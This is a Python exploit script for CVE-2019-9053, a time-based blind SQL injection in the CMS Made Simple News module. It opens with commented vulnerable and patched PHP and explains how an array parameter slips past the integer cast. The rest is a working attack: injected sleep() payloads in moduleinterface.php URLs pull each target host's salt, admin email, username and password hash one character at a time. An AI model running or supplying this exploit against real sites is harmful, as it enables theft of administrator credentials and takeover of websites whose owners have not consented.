#!/usr/bin/env python3

# Vulnerable News-module code (before the CVE-2019-9053 fix)

#    if( isset($params['idlist']) ) {
#        $idlist = $params['idlist'];
#        if( is_string($idlist) ) {
#            $tmp = explode(',',$idlist);
#            for( $i = 0; $i < count($tmp); $i++ ) {
#                $tmp[$i] = (int)$tmp[$i];
#                if( $tmp[$i] < 1 ) unset($tmp[$i]);
#            }
#            $idlist = array_unique($tmp);
#            $query1 .= ' (mn.news_id IN ('.implode(',',$idlist).')) AND ';
#        }
#    }

# Patched News-module code (after the CVE-2019-9053 fix)

#    if( isset($params['idlist']) ) {
#        $idlist = $params['idlist'];
#        if( is_string($idlist) ) {
#            $tmp = explode(',',$idlist);
#            $idlist = [];
#            for( $i = 0; $i < count($tmp); $i++ ) {
#                $val = (int)$tmp[$i];
#                if( $val > 0 && !in_array($val,$idlist) ) $idlist[] = $val;
#            }
#        }
#        if( !empty($idlist) ) $query1 .= ' (mn.news_id IN ('.implode(',',$idlist).')) AND ';
#    }

# Note that the cast-to-int sanitisation only runs inside the is_string() branch. PHP request parameters are not
# limited to strings and ints: an array value (`m1_idlist[]=...`, which is exactly what the URLs below send)
# never enters that branch, yet an array implodes just as happily as a string does.

import requests
from time import perf_counter as clock
import string
from binascii import hexlify
# One HTTP session shared by every probe below (connection reuse presumably keeps
# the timing baseline steadier than a fresh connection per request -- not verified here).
req = requests.Session()
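def _slow(url, interval, timeout):
    """Return True when a GET of ``url`` takes longer than ``interval`` seconds.

    A read timeout also counts as slow: ``timeout`` is required to exceed
    ``interval`` (checked by the caller), so a response that has not arrived by
    then has certainly crossed the threshold as well.  Connection failures are
    not caught and propagate to the caller.
    """
    start = clock()
    try:
        req.get(url, timeout=timeout)
    except requests.exceptions.ReadTimeout:
        return True
    return clock() - start > interval


def get_it(url_fmt, host, interval, charset, *, timeout=None):
    """Recover one value character by character through the time-based oracle.

    ``url_fmt`` is a template with three ``{}`` slots: the host, the number of
    seconds to ``sleep()``, and the hex-encoded prefix guessed so far (the
    templates in ``main`` follow that slot with ``25``, a hex ``%`` wildcard).
    A guess counts as a hit when the response takes longer than ``interval``
    seconds, i.e. when the injected ``sleep(interval)`` fired.  Because network
    jitter can push an ordinary response over the threshold, a hit is only
    accepted after a second request for the same guess is slow too.

    Args:
        url_fmt: URL template as described above.
        host: host (optionally ``host:port``) substituted into ``url_fmt``.
        interval: sleep length in seconds that marks a hit; must be positive.
        charset: candidate characters, tried in a fresh random order for every
            position.
        timeout: per-request read timeout in seconds.  Defaults to
            ``3 * interval`` so a hung server cannot stall the loop forever;
            it must be larger than ``interval``.

    Returns:
        The recovered value, lowercased -- the same string that is printed.
        Where ``charset`` holds both letter cases the case of each hit depends
        on guess order, so it is not meaningful.

    Raises:
        ValueError: if ``timeout`` does not exceed ``interval``.
    """
    from random import shuffle
    from sys import stdout

    if timeout is None:
        timeout = 3 * interval
    if timeout <= interval:
        raise ValueError('timeout must exceed interval')

    candidates = list(charset)
    recovered = ''
    while True:
        # Probe order is re-randomised each round, as in the original script;
        # presumably to avoid a predictable request pattern rather than for correctness.
        shuffle(candidates)
        hit = None
        for ch in candidates:
            guess = recovered + ch
            print('\r[i] Guess: {}'.format(guess), end='')
            stdout.flush()
            url = url_fmt.format(host, interval, hexlify(guess.encode('utf-8')).decode('utf-8'))
            # Two slow responses in a row before committing to a character.
            if _slow(url, interval, timeout) and _slow(url, interval, timeout):
                hit = guess
                break
        if hit is None:
            result = recovered.lower()
            print('\r[+] No further matches, we got: {}'.format(result))
            return result
        recovered = hit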

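def _baseline(host, samples=3, timeout=30):
    """Return the slowest of ``samples`` plain requests to ``host``, in seconds.

    One request is sent and discarded first (the original script did the
    same, presumably to absorb connection setup).  Taking the maximum of the
    remaining samples keeps a single unusually fast response from producing
    a sleep length that normal latency can then exceed.
    """
    url = 'http://{}/moduleinterface.php'.format(host)
    req.get(url, timeout=timeout)
    worst = 0.0
    for _ in range(samples):
        start = clock()
        req.get(url, timeout=timeout)
        worst = max(worst, clock() - start)
    return worst


def main():
    """Extract salt, admin e-mail, username and password hash from each host.

    Every command-line argument is a host (optionally ``host:port``) reached
    over plain HTTP.  The ``sleep()`` length is derived from a measured
    baseline so the timing oracle stays clear of normal request latency.
    A host that cannot be reached is reported and skipped.
    """
    from sys import argv, stderr
    from math import ceil

    args = argv[1:]
    if not args:
        print('usage: {} host[:port] [host[:port] ...]'.format(argv[0]), file=stderr)
        return

    # `m1_idlist[]=` submits the parameter as a PHP array, which never enters
    # the is_string() branch that casts each id to int (see the excerpt at the
    # top of the file).  `0x{}25` is the hex-encoded prefix followed by a hex
    # '%' wildcard; 0x736974656d61736b and 0x31 are hex for 'sitemask' and '1'.
    salt_target =     'http://{}/moduleinterface.php?mact=News,m1_,default,0&m1_idlist[]=1))+and+(select+sleep({})+from+cms_siteprefs+where+sitepref_value+like+0x{}25+and+sitepref_name+like+0x736974656d61736b)+--+'
    password_target = 'http://{}/moduleinterface.php?mact=News,m1_,default,0&m1_idlist[]=1))+and+(select+sleep({})+from+cms_users+where+password+like+0x{}25+and+user_id+like+0x31)+--+'
    email_target  =   'http://{}/moduleinterface.php?mact=News,m1_,default,0&m1_idlist[]=1))+and+(select+sleep({})+from+cms_users+where+email+like+0x{}25+and+user_id+like+0x31)+--+'
    username_target = 'http://{}/moduleinterface.php?mact=News,m1_,default,0&m1_idlist[]=1))+and+(select+sleep({})+from+cms_users+where+username+like+0x{}25+and+user_id+like+0x31)+--+'

    text_charset = string.ascii_letters + string.digits + "@.-+"

    for host in args:
        try:
            delta = _baseline(host)
        except requests.exceptions.RequestException as exc:
            print('[!] Skipping {}: {}'.format(host, exc), file=stderr)
            continue
        # Ten times the baseline, but never zero: sleep(0) gives no oracle at all.
        delay = max(1, int(ceil(delta * 10)))
        print('[i] Pre-flight Request Time: {}'.format(delta))
        print('[i] Guessed suitably safe sleep delay: {}'.format(delay))
        print('[i] Getting cryptographic salt/seed for {}'.format(host))
        get_it(salt_target, host, delay, string.hexdigits)
        print('[i] Getting admin email address for {}'.format(host))
        get_it(email_target, host, delay, text_charset)
        print('[i] Getting admin username for {}'.format(host))
        get_it(username_target, host, delay, text_charset)
        print('[i] Getting admin password hash for {}'.format(host))
        get_it(password_target, host, delay, string.hexdigits)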

# Script entry point; target hosts come from the command line (see main()).
if __name__ == '__main__':
    main()